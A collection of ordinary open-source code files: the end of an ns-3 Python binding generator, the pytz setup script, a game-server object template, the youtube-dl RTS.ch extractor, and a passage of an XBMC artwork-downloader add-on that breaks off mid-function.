## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_functions(root_module):
module = root_module
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
|
sanjeevtripurari/hue
|
refs/heads/master
|
desktop/core/ext-py/pytz-2015.2/setup.py
|
61
|
'''
pytz setup script
'''
import pytz, sys, os, os.path
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
me = 'Stuart Bishop'
memail = 'stuart@stuartbishop.net'
packages = ['pytz']
resources = ['zone.tab', 'locales/pytz.pot']
for dirpath, dirnames, filenames in os.walk(os.path.join('pytz', 'zoneinfo')):
# remove the 'pytz' part of the path
basepath = dirpath.split(os.path.sep, 1)[1]
resources.extend([os.path.join(basepath, filename)
for filename in filenames])
package_data = {'pytz': resources}
assert len(resources) > 10, 'zoneinfo files not found!'
setup (
name='pytz',
version=pytz.VERSION,
zip_safe=True,
description='World timezone definitions, modern and historical',
long_description=open('README.txt','r').read(),
author=me,
author_email=memail,
maintainer=me,
maintainer_email=memail,
url='http://pythonhosted.org/pytz',
license='MIT',
keywords=['timezone','tzinfo', 'datetime', 'olson', 'time'],
packages=packages,
package_data=package_data,
download_url='http://pypi.python.org/pypi/pytz',
platforms=['Independant'],
classifiers = [
'Development Status :: 6 - Mature',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
anhstudios/swganh
|
refs/heads/develop
|
data/scripts/templates/object/building/poi/shared_tatooine_burning_sandcrawler.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Building()
result.template = "object/building/poi/shared_tatooine_burning_sandcrawler.iff"
result.attribute_template_id = -1
result.stfName("poi_n","base_poi_building")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
Hakuba/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/rts.py
|
32
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .srgssr import SRGSSRIE
from ..compat import (
compat_str,
compat_urllib_parse_urlparse,
)
from ..utils import (
int_or_none,
parse_duration,
parse_iso8601,
unescapeHTML,
xpath_text,
)
class RTSIE(SRGSSRIE):
IE_DESC = 'RTS.ch'
_VALID_URL = r'rts:(?P<rts_id>\d+)|https?://(?:www\.)?rts\.ch/(?:[^/]+/){2,}(?P<id>[0-9]+)-(?P<display_id>.+?)\.html'
_TESTS = [
{
'url': 'http://www.rts.ch/archives/tv/divers/3449373-les-enfants-terribles.html',
'md5': 'f254c4b26fb1d3c183793d52bc40d3e7',
'info_dict': {
'id': '3449373',
'display_id': 'les-enfants-terribles',
'ext': 'mp4',
'duration': 1488,
'title': 'Les Enfants Terribles',
'description': 'France Pommier et sa soeur Luce Feral, les deux filles de ce groupe de 5.',
'uploader': 'Divers',
'upload_date': '19680921',
'timestamp': -40280400,
'thumbnail': 're:^https?://.*\.image',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
}
},
{
'url': 'http://www.rts.ch/emissions/passe-moi-les-jumelles/5624067-entre-ciel-et-mer.html',
'md5': 'f1077ac5af686c76528dc8d7c5df29ba',
'info_dict': {
'id': '5742494',
'display_id': '5742494',
'ext': 'mp4',
'duration': 3720,
'title': 'Les yeux dans les cieux - Mon homard au Canada',
'description': 'md5:d22ee46f5cc5bac0912e5a0c6d44a9f7',
'uploader': 'Passe-moi les jumelles',
'upload_date': '20140404',
'timestamp': 1396635300,
'thumbnail': 're:^https?://.*\.image',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
}
},
{
'url': 'http://www.rts.ch/video/sport/hockey/5745975-1-2-kloten-fribourg-5-2-second-but-pour-gotteron-par-kwiatowski.html',
'md5': 'b4326fecd3eb64a458ba73c73e91299d',
'info_dict': {
'id': '5745975',
'display_id': '1-2-kloten-fribourg-5-2-second-but-pour-gotteron-par-kwiatowski',
'ext': 'mp4',
'duration': 48,
'title': '1/2, Kloten - Fribourg (5-2): second but pour Gottéron par Kwiatowski',
'description': 'Hockey - Playoff',
'uploader': 'Hockey',
'upload_date': '20140403',
'timestamp': 1396556882,
'thumbnail': 're:^https?://.*\.image',
'view_count': int,
},
'skip': 'Blocked outside Switzerland',
},
{
'url': 'http://www.rts.ch/video/info/journal-continu/5745356-londres-cachee-par-un-epais-smog.html',
'md5': '9f713382f15322181bb366cc8c3a4ff0',
'info_dict': {
'id': '5745356',
'display_id': 'londres-cachee-par-un-epais-smog',
'ext': 'mp4',
'duration': 33,
'title': 'Londres cachée par un épais smog',
'description': 'Un important voile de smog recouvre Londres depuis mercredi, provoqué par la pollution et du sable du Sahara.',
'uploader': 'Le Journal en continu',
'upload_date': '20140403',
'timestamp': 1396537322,
'thumbnail': 're:^https?://.*\.image',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
}
},
{
'url': 'http://www.rts.ch/audio/couleur3/programmes/la-belle-video-de-stephane-laurenceau/5706148-urban-hippie-de-damien-krisl-03-04-2014.html',
'md5': 'dd8ef6a22dff163d063e2a52bc8adcae',
'info_dict': {
'id': '5706148',
'display_id': 'urban-hippie-de-damien-krisl-03-04-2014',
'ext': 'mp3',
'duration': 123,
'title': '"Urban Hippie", de Damien Krisl',
'description': 'Des Hippies super glam.',
'upload_date': '20140403',
'timestamp': 1396551600,
},
},
{
# article with videos on rhs
'url': 'http://www.rts.ch/sport/hockey/6693917-hockey-davos-decroche-son-31e-titre-de-champion-de-suisse.html',
'info_dict': {
'id': '6693917',
'title': 'Hockey: Davos décroche son 31e titre de champion de Suisse',
},
'playlist_mincount': 5,
}
]
def _real_extract(self, url):
m = re.match(self._VALID_URL, url)
media_id = m.group('rts_id') or m.group('id')
display_id = m.group('display_id') or media_id
def download_json(internal_id):
return self._download_json(
'http://www.rts.ch/a/%s.html?f=json/article' % internal_id,
display_id)
all_info = download_json(media_id)
# media_id extracted out of URL is not always a real id
if 'video' not in all_info and 'audio' not in all_info:
page = self._download_webpage(url, display_id)
# article with videos on rhs
videos = re.findall(
r'<article[^>]+class="content-item"[^>]*>\s*<a[^>]+data-video-urn="urn:([^"]+)"',
page)
if not videos:
videos = re.findall(
r'(?s)<iframe[^>]+class="srg-player"[^>]+src="[^"]+urn:([^"]+)"',
page)
if videos:
entries = [self.url_result('srgssr:%s' % video_urn, 'SRGSSR') for video_urn in videos]
return self.playlist_result(entries, media_id, self._og_search_title(page))
internal_id = self._html_search_regex(
r'<(?:video|audio) data-id="([0-9]+)"', page,
'internal video id')
all_info = download_json(internal_id)
media_type = 'video' if 'video' in all_info else 'audio'
# check for errors
self.get_media_data('rts', media_type, media_id)
info = all_info['video']['JSONinfo'] if 'video' in all_info else all_info['audio']
upload_timestamp = parse_iso8601(info.get('broadcast_date'))
duration = info.get('duration') or info.get('cutout') or info.get('cutduration')
if isinstance(duration, compat_str):
duration = parse_duration(duration)
view_count = info.get('plays')
thumbnail = unescapeHTML(info.get('preview_image_url'))
def extract_bitrate(url):
return int_or_none(self._search_regex(
r'-([0-9]+)k\.', url, 'bitrate', default=None))
formats = []
for format_id, format_url in info['streams'].items():
if format_id == 'hds_sd' and 'hds' in info['streams']:
continue
if format_id == 'hls_sd' and 'hls' in info['streams']:
continue
if format_url.endswith('.f4m'):
token = self._download_xml(
'http://tp.srgssr.ch/token/akahd.xml?stream=%s/*' % compat_urllib_parse_urlparse(format_url).path,
media_id, 'Downloading %s token' % format_id)
auth_params = xpath_text(token, './/authparams', 'auth params')
if not auth_params:
continue
formats.extend(self._extract_f4m_formats(
'%s?%s&hdcore=3.4.0&plugin=aasp-3.4.0.132.66' % (format_url, auth_params),
media_id, f4m_id=format_id, fatal=False))
elif format_url.endswith('.m3u8'):
formats.extend(self._extract_m3u8_formats(
format_url, media_id, 'mp4', 'm3u8_native', m3u8_id=format_id, fatal=False))
else:
formats.append({
'format_id': format_id,
'url': format_url,
'tbr': extract_bitrate(format_url),
})
if 'media' in info:
formats.extend([{
'format_id': '%s-%sk' % (media['ext'], media['rate']),
'url': 'http://download-video.rts.ch/%s' % media['url'],
'tbr': media['rate'] or extract_bitrate(media['url']),
} for media in info['media'] if media.get('rate')])
self._check_formats(formats, media_id)
self._sort_formats(formats)
return {
'id': media_id,
'display_id': display_id,
'formats': formats,
'title': info['title'],
'description': info.get('intro'),
'duration': duration,
'view_count': view_count,
'uploader': info.get('programName'),
'timestamp': upload_timestamp,
'thumbnail': thumbnail,
}
|
SMALLplayer/smallplayer-image-creator
|
refs/heads/master
|
storage/.xbmc/addons/script.artwork.downloader/default.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2013 Martijn Kaijser
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#import modules
import os
import sys
import xbmc
import xbmcaddon
import xbmcgui
import time
import lib.common
### get addon info
__addon__ = lib.common.__addon__
__addonname__ = lib.common.__addonname__
__addonpath__ = lib.common.__addonpath__
__addonprofile__ = lib.common.__addonprofile__
__localize__ = lib.common.__localize__
__version__ = lib.common.__version__
### import libraries
from lib import language
from lib import provider
from lib.apply_filters import filter
from lib.art_list import arttype_list
from lib.fileops import fileops, cleanup
from lib.gui import choose_image, dialog_msg, choice_type, gui_imagelist, hasimages
from lib.media_setup import _media_listing as media_listing
from lib.media_setup import _media_unique as media_unique
from lib.provider import tmdb # import on behalf of searching when there's no ID
from lib.provider.local import local
from lib.report import create_report
from lib.script_exceptions import *
from lib.settings import get_limit, get, check
from lib.utils import *
from traceback import print_exc
from urlparse import urlsplit
from xml.parsers.expat import ExpatError
arttype_list = arttype_list()
cancelled = False
download_arttypes = []
download_counter = {'Total Artwork': 0}
download_list = []
download_succes = False
failed_items = []
image_list = []
limit = get_limit()
reportdata = '[B]Artwork Downloader:[/B]'
setting = get()
startup = {'mediatype': False,
'dbid': False,
'mode': False,
'silent': False}
class Main:
def __init__(self):
if not check(): # Check if there are some faulty combinations present
sys.exit(1)
if self.initialise():
global setting
global startup
providers = provider.get_providers()
# Check for silent background mode
if startup['silent']:
setting['background'] = True
setting['notify'] = False
# Check for gui mode
elif startup['mode'] == 'gui':
setting['background'] = True
setting['notify'] = False
setting['files_overwrite'] = True
dialog_msg('create',
line1 = __localize__(32008),
background = setting['background'])
# Check if mediatype is specified
if startup['mediatype']:
# Check if dbid is specified
if startup['dbid']:
mediaList = media_unique(startup['mediatype'],startup['dbid'])
if startup['mediatype'] == 'movie':
self.download_artwork(mediaList, providers['movie_providers'])
elif startup['mediatype'] == 'tvshow':
self.download_artwork(mediaList, providers['tv_providers'])
elif startup['mediatype'] == 'musicvideo':
self.download_artwork(mediaList, providers['musicvideo_providers'])
if (not dialog_msg('iscanceled', background = setting['background']) and not
(startup['mode'] == 'customgui' or
startup['mode'] == 'gui')):
self._batch_download(download_list)
else:
# If no medianame specified
# 1. Check what media type was specified, 2. Retrieve library list, 3. Enable the correct type, 4. Do the API stuff
setting['movie_enable'] = False
setting['tvshow_enable'] = False
setting['musicvideo_enable'] = False
if startup['mediatype'] == 'movie':
setting['movie_enable'] = True
mediaList = media_listing('movie')
self.download_artwork(mediaList, providers['movie_providers'])
elif startup['mediatype'] == 'tvshow':
setting['tvshow_enable'] = True
mediaList = media_listing('tvshow')
self.download_artwork(mediaList, providers['tv_providers'])
elif startup['mediatype'] == 'musicvideo':
setting['musicvideo_enable'] = True
mediaList = media_listing('musicvideo')
self.download_artwork(mediaList, providers['musicvideo_providers'])
if not dialog_msg('iscanceled', background = setting['background']):
self._batch_download(download_list)
# No mediatype is specified
else:
# activate movie/tvshow/musicvideo for custom run
if startup['mode'] == 'custom':
setting['movie_enable'] = True
setting['tvshow_enable'] = True
setting['musicvideo_enable'] = True
# Normal oprations check
# 1. Check if enable, 2. Get library list, 3. Set mediatype, 4. Do the API stuff
# Do this for each media type
if setting['movie_enable'] and not dialog_msg('iscanceled', background = True):
startup['mediatype'] = 'movie'
mediaList = media_listing(startup['mediatype'])
self.download_artwork(mediaList, providers['movie_providers'])
if setting['tvshow_enable'] and not dialog_msg('iscanceled', background = True):
startup['mediatype'] = 'tvshow'
mediaList = media_listing(startup['mediatype'])
self.download_artwork(mediaList, providers['tv_providers'])
if setting['musicvideo_enable'] and not dialog_msg('iscanceled', background = True):
startup['mediatype'] = 'musicvideo'
mediaList = media_listing(startup['mediatype'])
self.download_artwork(mediaList, providers['musicvideo_providers'])
# If not cancelled throw the whole downloadlist into the batch downloader
if not dialog_msg('iscanceled',
background = setting['background']):
self._batch_download(download_list)
else:
log('Initialisation error, script aborting', xbmc.LOGERROR)
# Make sure that files_overwrite option get's reset after downloading
__addon__.setSetting(id='files_overwrite', value='false')
cleanup()
self.report()
### load settings and initialise needed directories
def initialise(self):
global startup
log('## Checking for downloading mode...')
args = ['silent', 'mode', 'mediatype', 'dbid']
for item in sys.argv:
arg = item.split('=')
i = arg[0]
if arg[0] in args:
j = arg[1]
startup.update({arg[0]:arg[1]})
if startup['mediatype'] and (startup['mediatype'] not in ['tvshow', 'movie', 'musicvideo']):
log('Error: invalid mediatype, must be one of movie, tvshow or musicvideo', xbmc.LOGERROR)
return False
elif startup['dbid'] == '':
dialog_msg('okdialog',
line1 = __localize__(32084))
log('Error: no valid dbid recieved, item must be scanned into library.', xbmc.LOGERROR)
return False
try:
# Creates temp folder
self.fileops = fileops()
except CreateDirectoryError, e:
log('Could not create directory: %s' % str(e))
return False
else:
return True
def report(self):
global setting
### log results and notify user
# Download totals to log and to download report
create_report(reportdata, download_counter, failed_items)
# Build dialog messages
summary = __localize__(32012) + ': %s ' % download_counter['Total Artwork'] + __localize__(32020)
summary_notify = ': %s ' % download_counter['Total Artwork'] + __localize__(32020)
provider_msg1 = __localize__(32001)
provider_msg2 = __localize__(32184) + ' | ' + __localize__(32185) + ' | ' + __localize__(32186)
# Close dialog in case it was open before doing a notification
time.sleep(2)
dialog_msg('close',
background = setting['background'])
# Some dialog checks
if setting['notify']:
log('Notify on finished/error enabled')
setting['background'] = False
if (xbmc.Player().isPlayingVideo() or startup['silent'] or
startup['mode'] in ['gui', 'customgui', 'custom']):
log('Silent finish because of playing a video or silent mode')
setting['background'] = True
if not setting['failcount'] < setting['failthreshold']:
log('Network error detected, script aborted', xbmc.LOGERROR)
dialog_msg('okdialog',
line1 = __localize__(32010),
line2 = __localize__(32011),
background = setting['background'])
if not xbmc.abortRequested:
# Show dialog/notification
if setting['background']:
dialog_msg('okdialog',
line0 = summary_notify,
line1 = provider_msg1 + ' ' + provider_msg2,
background = setting['background'],
cancelled = cancelled)
else:
# When chosen no in the 'yes/no' dialog execute the viewer.py and parse 'downloadreport'
if dialog_msg('yesno',
line1 = summary,
line2 = provider_msg1,
line3 = provider_msg2,
background = setting['background'],
nolabel = __localize__(32027),
yeslabel = __localize__(32028)):
runcmd = os.path.join(__addonpath__, 'lib/viewer.py')
xbmc.executebuiltin('XBMC.RunScript (%s,%s) '%(runcmd, 'downloadreport'))
else:
dialog_msg('okdialog',
line1 = __localize__(32010),
line2 = summary,
background = setting['background'])
# Container refresh
if startup['mode'] in ['gui','customgui']:
if download_succes:
xbmc.executebuiltin('Container.Refresh')
#xbmc.executebuiltin('XBMC.ReloadSkin()')
### download media fanart
def download_artwork(self, media_list, providers):
global image_list
global reportdata
processeditems = 0
media_list_total = len(media_list)
for currentmedia in media_list:
image_list = []
# Declare some vars
if not currentmedia.get('disctype'):
currentmedia['disctype'] = 'n/a'
### check if XBMC is shutting down
if xbmc.abortRequested:
log('XBMC abort requested, aborting')
reportdata += ('\n - %s: %s' %(__localize__(32150), time.strftime('%d %B %Y - %H:%M')))
break
### check if script has been cancelled by user
if dialog_msg('iscanceled',
background = setting['background']):
reportdata += ('\n - %s [%s]: %s' %(__localize__(32151), currentmedia['mediatype'], time.strftime('%d %B %Y - %H:%M')))
break
# abort script because of to many failures
if not setting['failcount'] < setting['failthreshold']:
reportdata += ('\n - %s: %s' %(__localize__(32152), time.strftime('%d %B %Y - %H:%M')))
break
dialog_msg('update',
percentage = int(float(processeditems) / float(media_list_total) * 100.0),
line1 = currentmedia['name'],
line2 = __localize__(32008),
line3 = '',
background = setting['background'])
log('########################################################')
log('Processing media: %s' % currentmedia['name'])
# do some id conversions
if (not currentmedia['mediatype'] == 'tvshow' and
currentmedia['id'] in ['','tt0000000','0']):
log('No IMDB ID found, trying to search themoviedb.org for matching title.')
currentmedia['id'] = tmdb._search_movie(currentmedia['name'],currentmedia['year'])
elif (currentmedia['mediatype'] == 'movie' and not
currentmedia['id'] == '' and not
currentmedia['id'].startswith('tt')):
log('No valid ID found, trying to search themoviedb.org for matching title.')
currentmedia['id'] = tmdb._search_movie(currentmedia['name'],currentmedia['year'])
log('Provider ID: %s' % currentmedia['id'])
log('Media path: %s' % currentmedia['path'])
# Declare the target folders
artworkdir = []
extrafanartdirs = []
extrathumbsdirs = []
for item in currentmedia['path']:
artwork_dir = os.path.join(item + '/')
extrafanart_dir = os.path.join(artwork_dir + 'extrafanart' + '/')
extrathumbs_dir = os.path.join(artwork_dir + 'extrathumbs' + '/')
artworkdir.append(artwork_dir.replace('BDMV/','').replace('VIDEO_TS/',''))
extrafanartdirs.append(extrafanart_dir)
extrathumbsdirs.append(extrathumbs_dir)
# Check if using the centralize option
if setting['centralize_enable']:
if currentmedia['mediatype'] == 'tvshow':
extrafanartdirs.append(setting['centralfolder_tvshows'])
elif currentmedia['mediatype'] == 'movie':
extrafanartdirs.append(setting['centralfolder_movies'])
currentmedia['artworkdir'] = artworkdir
currentmedia['extrafanartdirs'] = extrafanartdirs
currentmedia['extrathumbsdirs'] = extrathumbsdirs
# this part check for local files when enabled
scan_more = True
missing = False
if setting['files_local']:
local_list = []
local_list, scan_more, missing = local().get_image_list(currentmedia)
# append local artwork
for item in local_list:
image_list.append(item)
# Check for presence of id used by source sites
if (startup['mode'] == 'gui' and
((currentmedia['id'] == '') or
(currentmedia['mediatype'] == 'tvshow' and
currentmedia['id'].startswith('tt')))):
dialog_msg('close',
background = setting['background'])
dialog_msg('okdialog',
'',
currentmedia['name'],
__localize__(32030))
elif currentmedia['id'] == '':
log('- No ID found, skipping')
failed_items.append('[%s] ID %s' %(currentmedia['name'], __localize__(32022)))
elif currentmedia['mediatype'] == 'tvshow' and currentmedia['id'].startswith('tt'):
log('- IMDB ID found for TV show, skipping')
failed_items.append('[%s]: TVDB ID %s' %(currentmedia['name'], __localize__(32022)))
#skip scanning for more if local files have been found and not run in gui / custom mode
elif not scan_more and not startup['mode'] in ['gui', 'custom']:
log('- Already have all files local')
pass
# If correct ID found and don't already have all artwork retrieve from providers
else:
log('- Still missing some files')
log(missing)
temp_image_list = []
# Run through all providers getting their imagelisting
failcount = 0
for self.provider in providers:
if not failcount < setting['failthreshold']:
break
artwork_result = ''
xmlfailcount = 0
while not artwork_result == 'pass' and not artwork_result == 'skipping':
if artwork_result == 'retrying':
xbmc.sleep(setting['api_timedelay'])
try:
temp_image_list = self.provider.get_image_list(currentmedia['id'])
#pass
except HTTP404Error, e:
errmsg = '404: File not found'
artwork_result = 'skipping'
except HTTP503Error, e:
xmlfailcount += 1
errmsg = '503: API Limit Exceeded'
artwork_result = 'retrying'
except NoFanartError, e:
errmsg = 'No artwork found'
artwork_result = 'skipping'
failed_items.append('[%s] %s' %(currentmedia['name'], __localize__(32133)))
except ItemNotFoundError, e:
errmsg = '%s not found' % currentmedia['id']
artwork_result = 'skipping'
except ExpatError, e:
xmlfailcount += 1
errmsg = 'Error parsing xml: %s' % str(e)
artwork_result = 'retrying'
except HTTPTimeout, e:
failcount += 1
errmsg = 'Timed out'
artwork_result = 'skipping'
except DownloadError, e:
failcount += 1
errmsg = 'Possible network error: %s' % str(e)
artwork_result = 'skipping'
else:
artwork_result = 'pass'
for item in temp_image_list:
image_list.append(item)
if not xmlfailcount < setting['xmlfailthreshold']:
artwork_result = 'skipping'
if not artwork_result == 'pass':
log('Error getting data from %s (%s): %s' % (self.provider.name, errmsg, artwork_result))
if len(image_list) > 0:
if (limit['limit_artwork'] and limit['limit_extrafanart_max'] < len(image_list)):
self.download_max = limit['limit_extrafanart_max']
else:
self.download_max = len(image_list)
# Check for GUI mode
if startup['mode'] == 'gui':
log('- Using GUI mode')
self._gui_mode(currentmedia)
elif startup['mode'] == 'custom':
log('- Using custom mode')
self._custom_mode(currentmedia)
else:
#log('- Using bulk mode')
self._download_process(currentmedia)
processeditems += 1
### Processes the different modes for downloading of files
def _download_process(self, currentmedia):
# with the exception of cutsom mode run through the art_list to see which ones are enabled and create a list with those
# then call _download_art to process it
if not startup['mode'] == 'custom':
global download_arttypes
download_arttypes = []
for art_type in arttype_list:
if art_type['bulk_enabled'] and startup['mediatype'] == art_type['media_type']:
download_arttypes.append(art_type['art_type'])
# do the same but for custom mode
for art_type in arttype_list:
if (art_type['art_type'] in download_arttypes and
((setting['movie_enable'] and startup['mediatype'] == art_type['media_type']) or
(setting['tvshow_enable'] and startup['mediatype'] == art_type['media_type']) or
(setting['musicvideo_enable'] and startup['mediatype'] == art_type['media_type']))):
if art_type['art_type'] == 'extrafanart':
self._download_art(currentmedia, art_type, currentmedia['extrafanartdirs'])
elif art_type['art_type'] == 'extrathumbs':
self._download_art(currentmedia, art_type, currentmedia['extrathumbsdirs'])
else:
self._download_art(currentmedia, art_type, currentmedia['artworkdir'])
### Artwork downloading
def _download_art(self, currentmedia, art_item, targetdirs):
log('* Image type: %s' %art_item['art_type'])
seasonfile_presents = []
current_artwork = 0 # Used in progras dialog
limit_counter = 0 # Used for limiting on number
pref_language = language.get_abbrev() # get abbreviation
i = 0 # Set loop counter
imagefound = False # Set found image false
imageignore = False # Set ignaore image false
missingfiles = False
global download_list
final_image_list = []
if startup['mode'] in ['gui', 'customgui'] and not art_item['art_type'] in ['extrafanart', 'extrathumbs']:
final_image_list.append(image_list)
else:
final_image_list = image_list
if len(final_image_list) == 0:
log(' - Nothing to download')
else:
# Do some language shit
# loop two times than skip
while (i < 2 and not imagefound):
# when no image found found after one imagelist loop set to english
if not imagefound and i == 1:
pref_language = 'en'
log('! No matching %s artwork found. Searching for English backup' %limit['limit_preferred_language'])
# loop through image list
for artwork in final_image_list:
if art_item['art_type'] in artwork['art_type']:
### check if script has been cancelled by user
if dialog_msg('iscanceled',
background = setting['background']):
#dialog('close', background = setting['background'])
break
# Create an image info list
item = {'url': artwork['url'],
'targetdirs': targetdirs,
'media_name': currentmedia['name'],
'mediatype':currentmedia['mediatype'],
'artwork_string': art_item['gui_string'],
'artwork_details': artwork,
'dbid':currentmedia['dbid'],
'art':currentmedia['art'],
'art_type':art_item['art_type']}
# raise artwork counter only on first loop
if i != 1:
current_artwork += 1
# File naming
if art_item['art_type'] == 'extrafanart':
item['filename'] = ('%s.jpg'% artwork['id'])
elif art_item['art_type'] == 'extrathumbs':
item['filename'] = (art_item['filename'] % str(limit_counter + 1))
elif art_item['art_type'] in ['seasonposter']:
if artwork['season'] == '0':
item['filename'] = "season-specials-poster.jpg"
elif artwork['season'] == 'all':
item['filename'] = "season-all-poster.jpg"
elif artwork['season'] == 'n/a':
break
else:
item['filename'] = (art_item['filename'] % int(artwork['season']))
elif art_item['art_type'] in ['seasonbanner']:
if artwork['season'] == '0':
item['filename'] = "season-specials-banner.jpg"
elif artwork['season'] == 'all':
item['filename'] = "season-all-banner.jpg"
elif artwork['season'] == 'n/a':
break
else:
item['filename'] = (art_item['filename'] % int(artwork['season']))
elif art_item['art_type'] in ['seasonlandscape']:
if artwork['season'] == 'all' or artwork['season'] == '':
item['filename'] = "season-all-landscape.jpg"
else:
item['filename'] = (art_item['filename'] % int(artwork['season']))
else:
item['filename'] = art_item['filename']
for targetdir in item['targetdirs']:
item['localfilename'] = os.path.join(targetdir, item['filename']).encode('utf-8')
break
# Continue
if startup['mode'] in ['gui', 'customgui'] and not art_item['art_type'] in ['extrafanart', 'extrathumbs']:
# Add image to download list
download_list.append(item)
# jump out of the loop
imagefound = True
else:
# Check for set limits
if (setting['files_local'] and not
item['url'].startswith('http') and not
art_item['art_type'] in ['extrafanart', 'extrathumbs']):
# if it's a local file use this first
limited = [False, 'This is your local file']
elif art_item['art_type'] == 'discart':
limited = filter(art_item['art_type'],
startup['mediatype'],
item['artwork_details'],
limit_counter,
pref_language,
currentmedia['disctype'])
else:
limited = filter(art_item['art_type'],
startup['mediatype'],
item['artwork_details'],
limit_counter,
pref_language)
# Delete extrafanart when below settings and parsing the reason message
if limited[0] and not i == 1 and art_item['art_type'] in ['extrafanart', 'extrathumbs']:
#self.fileops._delete_file_in_dirs(item['filename'], item['targetdirs'], limited[1],currentmedia['name'])
pass
# Just ignore image when it's below settings
elif limited[0]:
imageignore = True
log(' - Ignoring (%s): %s' % (limited[1], item['filename']))
else:
# Always add to list when set to overwrite
if setting['files_overwrite']:
log(' - Adding to download list (overwrite enabled): %s' % item['filename'])
download_list.append(item)
imagefound = True
else:
artcheck = item['art']
# Check if extrathumbs/extrafanart image already exist local
if art_item['art_type'] in ['extrathumbs','extrafanart']:
for targetdir in item['targetdirs']:
if not self.fileops._exists(os.path.join(targetdir, item['filename'])):
missingfiles = True
# Check if image already exist in database
elif not art_item['art_type'] in ['seasonlandscape','seasonbanner','seasonposter']:
if setting['files_local']and not self.fileops._exists(item['localfilename']):
missingfiles = True
elif not artcheck.get(art_item['art_type']):
missingfiles = True
if missingfiles:
# If missing add to list
imagefound = True
